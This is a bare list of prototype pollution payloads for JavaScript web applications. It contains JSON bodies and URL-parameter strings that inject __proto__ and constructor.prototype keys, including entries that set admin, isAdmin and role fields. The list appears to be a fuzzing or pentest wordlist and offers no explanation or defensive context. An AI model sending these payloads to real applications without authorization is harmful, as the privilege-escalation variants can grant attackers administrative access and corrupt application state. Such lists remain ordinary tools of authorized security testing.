# Prototype Pollution Payloads
# JSON body — __proto__ injection
{"__proto__":{"polluted":"true"}}
{"__proto__":{"admin":true}}
{"__proto__":{"status":510}}
{"__proto__":{"isAdmin":true}}
{"__proto__":{"role":"admin"}}
# JSON body — constructor.prototype
{"constructor":{"prototype":{"polluted":"true"}}}
{"constructor":{"prototype":{"admin":true}}}
# Nested pollution
{"a":{"__proto__":{"polluted":"true"}}}
{"a":{"constructor":{"prototype":{"polluted":"true"}}}}
# URL parameter variants
__proto__[polluted]=true
__proto__.polluted=true
constructor[prototype][polluted]=true
constructor.prototype.polluted=true
__proto__[toString]=polluted
__proto__[valueOf]=polluted
